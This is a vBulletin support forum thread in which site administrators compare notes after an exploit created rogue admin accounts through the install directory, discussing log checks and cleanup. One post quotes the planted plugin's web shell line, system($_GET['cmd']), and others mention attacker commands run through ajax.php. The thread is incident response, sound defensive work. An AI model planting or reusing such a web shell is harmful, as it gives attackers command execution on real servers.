Announcement

Collapse
No announcement yet.

Exploit Questions

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Pingu
    replied
    If you have apache logs (or whatever webserver you run), look for ip addresses accessing install/upgrade.php. That'll give you a clue, I guess

    Leave a comment:


  • HondaATC
    replied
    I don't have any ip address to cross reference with the registration I had happen though unfortunately...

    Leave a comment:


  • Pingu
    replied
    Suffering the same sort of hack. A plugin was added to our vB (ajax_complete), which through ajap.php, provided the hacker access to system commands. I've checked the access_log and nothing happened after a "uname -a". Except that another ip address (both ip addresses belong to Leaseweb Netherlands) has accessed the same ajax.php with the same uname command. No other commands have been run though ajax.php. The error_log shows they were trying to mess with the database though trough vb_database_alter, amongst other things.

    vB has been cleaned up, ip addresses have been added to the firewall (for what is worth).


    Still, check your access and error logs if you suffered the same. Whatever's been done might go further then the vB control panel logs will show.

    Leave a comment:


  • HondaATC
    replied
    Originally posted by Wayne Luke View Post

    They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.
    My administrative log did not indicate there were any plugins modified/uploaded, and pruning it is locked via the config file. Am I safe to assume nothing else happened then?

    Leave a comment:


  • EvilArcana
    replied
    I was hacked this morning...not sure if it was this exploit or not, but I had an admin user that created a default plugin that was an ajax start that did the following:

    system($_GET['cmd']);

    I've deleted the user...

    He replaced my index.php with some text that said "HACKED...Fix yo s**t" only it wasn't censored...From what I can tell, that's the only damage that was done. Is this the kind of activity you would expect from this exploit? Should I submit a ticket to get someone to look into further damages and issues? It looks like the individual was sending a warning or something for us to tighten up on security or something.

    I mainly want to make sure I got rid of all the back doors he may have put in. The plugin that had the system command in it existed twice.

    There's some other stuff that he did, but I'm not sure how to get the details and what I shoudl look for...here's my admin log:

    http://pastebin.com/FJ8DkhPp

    Leave a comment:


  • Wayne Luke
    replied
    Originally posted by HondaATC View Post
    Right, I checked there and have'nt seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?
    They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.

    Leave a comment:


  • contemptx
    replied
    Several of my forums were affected by this exploit, however only one of the forums had activity from the hacked user which was them grabbing the email list.

    44237 support 22:27, 3rd Sep 2013 email.php makelist 99.227.104.35
    44236 support 22:27, 3rd Sep 2013 email.php genlist 99.227.104.35

    Leave a comment:


  • jscherbel
    replied
    I had the same things and did the same steps (removing /install and deleting the three new administrator accounts). Interested to know from the greater community whether anyone has found that anything else was done with these user accounts.

    Leave a comment:


  • HondaATC
    replied
    Right, I checked there and have'nt seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?

    Leave a comment:


  • Lynne
    replied
    You can see what they were doing by looking in your Statistics & Logs > Control Panel Logs.

    Leave a comment:


  • HondaATC
    started a topic [CMS] Exploit Questions

    Exploit Questions

    Received the email notice this morning, logged into my forum, just HAPPENED by shear luck to see a new registered member "Th3H4ck" and scene they had administrative powers. So I immediately deleted their account, and removed the /install directory on my forum as indicated. The site is not defaced and otherwise appears to be OK.

    HOWEVER, I am reading about other members having admin log entries changed and such, how can I verify nothing was changed in the database or put elsewhere? I ran the admincp log and didn't see anything out of normal running back the past several days.

    Please advise.
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X